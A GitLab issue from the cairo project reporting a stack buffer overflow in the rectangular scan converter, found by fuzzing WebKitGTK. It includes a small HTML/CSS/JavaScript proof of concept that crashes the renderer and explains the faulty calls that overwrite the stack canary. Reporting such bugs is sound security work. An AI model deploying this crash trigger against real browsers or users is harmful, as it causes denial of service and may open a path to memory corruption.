Skip to content
GitLab
Projects Groups Snippets
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Sign in / Register
  • C cairo
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributors
    • Graph
    • Compare
  • Issues 340
    • Issues 340
    • List
    • Boards
    • Service Desk
    • Milestones
  • Merge requests 42
    • Merge requests 42
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Schedules
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Container Registry
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • cairo
  • cairo
  • Issues
  • #341
Closed
Open
Issue created Oct 08, 2018 by dwfault@dwfault

Out of bound memset in libcairo result in stack buffer overflow

Hello, I found a bug that could result in a stack buffer overflow in libcairo. This bug was found in the process of fuzzing WebKitGTK. This bug was originally found in cairo-1.14.8, but the recent git commit 06ef6db9 could also make this one reproduceable.

 <style>
   #da {
     border-left: solid 1em;
     border-top-left-radius: 27vmin;
     border-bottom-style: double;
   }
   #ta {
     font-family: 'Calibri';
   }
   :root {
     -webkit-border-end: solid 1px;
     column-width: 1px
   }
 </style>
 <script>
   function js() {
     ta.cols = 38;
   }
 </script>
 <body onload=js()>
   <dialog id="da"><textarea id="ta"/></dialog>
 </body>

cairo-rectanglular-scan-converter.c:

function generate() calls render_rows() and _cairo_image_spans_and_zero() is actually called. With the provided PoC,there are 5 times of the calling before the process crash, among which the last overflow the buffer and rewrite the stack canary. (In some untrimmed PoC, the content also rewrite the return address on stack.)

_cairo_image_spans_and_zero() write zero to stack, but the root cause of the crash could reside in the logic of function generate(). Thus besides DoS, unspecified affect could also exists. This bug was found by ADLab of Venustech.

Edited Nov 05, 2018 by dwfault
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information
Assignee
Assign to
Time tracking